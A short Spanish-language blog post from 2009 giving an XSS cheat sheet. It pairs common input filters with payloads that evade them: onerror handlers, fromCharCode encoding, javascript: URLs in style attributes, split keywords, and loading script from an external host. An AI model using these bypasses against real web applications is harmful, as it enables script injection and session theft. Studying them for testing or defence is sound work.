viernes, 20 de febrero de 2009

XSS CheatSheet

Aqui os dejo esta pequeña "Chuleta" sobre XSS. Yo recomiendo guardarla en marcadores por si alguna vez os hace falta :P. La cosa es que quería postearla de tal forma que puedieramos buscar el tipo de filtro en ella... haber que tal os parece.



-Bloqueo del Número máximo de caracteres

Hacer Form Tampering o modificar el header


-Codigo se queda en un value=""

Poner un "> u otro elemento de clausura que nos deje salirnos



-Magic Quotes activadas (imposibilidad de poner comillas)

Poner el código .js en un host externo y hacer <script src=tuhost></script>


-Te impide poner / para cerrar un tag

<img src=. onerror=alert(/XSSed/)>


-
Eliminación de caracteres especiales

<script>alert(
String.fromCharCode(88,83,83));</script> Siendo los números el valor del caracter en ASCII


-Filtro Strip_Tags (puedes meter algunos tags, pero otros como <script> los bloquea

<
p style="background: url("JavaScript:alert(/xss/);">



-Supresión de ciertas expresiones o palabras

Salto de linea
JavaScr
ipt:alert(1);

Inclusión de otra palabra tabú en mitad de la que queramos
java<script>script:alert(1);

Eliminación de funciones y expresiones dentro del código javascript
javascript:alert(eval('Saltando'+' Bypass'));



===============================================

Hasta aquí nuestra pequeña colección... realmente quisiera que me mandarais más al correo de contacto, las publicaré añadiendo el nombre del que me las haya mandado.

PD: Aqui teneis muuuuuuuuuuuuuuuuuuchas más formas interesantes:
XSS CheatSheet
5 0verl0ad Labs: XSS CheatSheet Aqui os dejo esta pequeña "Chuleta" sobre XSS. Yo recomiendo guardarla en marcadores por si alguna vez os hace falta :P. La cosa e...

2 comentarios:

Lix dijo...
Este comentario ha sido eliminado por el autor.
Lix dijo...

Vectores inusuales:
New XSS vectors/Unusual Javascript

< >